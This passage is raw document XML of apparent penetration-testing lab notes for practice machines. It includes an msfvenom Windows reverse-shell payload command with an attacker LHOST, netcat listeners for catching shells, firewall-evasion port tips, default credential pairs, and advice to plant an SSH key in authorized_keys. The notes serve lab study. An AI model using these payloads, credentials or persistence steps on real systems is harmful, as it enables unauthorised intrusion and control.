          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USE PENELOPE: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000242">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/brightio/penelope</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When copy and pasting from a website to the command line, sometimes they use curly quotes instead of straight quotes.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The terminal only understands straight quotes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so manually change them to straight quotes. You know they are straight quotes when they turn orange</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An example of curly quotes is this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000245">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p windows/shell_reverse_tcp -b </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST=192.168.45.201 LPORT=443 -e x86/alpha_mixed -f c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000246">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Kevin</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247">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To turn off curly (smart) quotes in Google Doc, go to "Tools" and then "Preference" and then uncheck "Use Smart Quotes," and then go to CTRL + F and replace all the curly quotes with the straight quotes just by replacing itself with itself</w:t>
      </w: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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000249">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a password or a flag isn't working even though it should, that possibly means it's encoded or encrypted and needs to be decoded or decrypted. Like if it ends in "==", that means it's probably base64 encoded</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can save the IP of target machine as an environment variable to make it easier to run commands</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip="10.10.10.10"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap $ip</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Just type $ip whenever you want to use the IP address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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TIP: On the target machine, move to /tmp or any other non-important directory (like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/shm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) since sometimes if you are in another directory, you might not have valid permissions to upload to that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000251">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1187"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For the reverse shell, if port 4444 doesn't work. It might be blocked. Try ports like 80 and 443 that likely not blocked. Since your Kali Machine doesn't use port 80 pr 443, it should work</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n0iyvt7nyda" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Credentials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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Billyboss</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we learned a cool strategy to look for default credentials for a service. Let's say the service is called "Sonatype Nexus." </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000259">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /usr/share/seclists/Passwords/Default-Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you don't have seclists, then download it:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install seclists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep -r "Sonatype Nexus"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will recursively search the entire directory for this string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="457200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="181" name="image171.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image171.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="176"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here we see two sets of credentials. The latter of which was used to get into the website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Vagrant:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000262">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you see a user vagrant, then try logging in with password "vagrant", as shown in Blogger PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Put in the password "vagrant"</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Nagios XI:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000267">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Username: nagiosadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="776"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password: admin</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Try logging in as root via "su root" and then try password "root"</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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_plcyhht2z52v" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get a more stable connection after getting reverse shell</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Obviously, try upgrading the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000270">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, then upload your private key to authorized_keys and then SSH into machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000271">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SSH public key injection attack via authorized_keys file</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000272">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Add a sudo </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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3z9piaqe9pj3" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install</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Whenever I try doing pip3 install, I get this error:</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943600" cy="2006600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="415" name="image397.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image397.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1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But, if you look at the bottom, it tells you that you can bypass it by using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--break-system-packages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, you can run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pip3 install &lt;package&gt; --break-system-packages</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_38ax56qcj64d" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to catch UDP reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000287">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnup 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000288">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have to add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lag</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap -cA nc -lvnp 4444</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="574"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" flag means </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
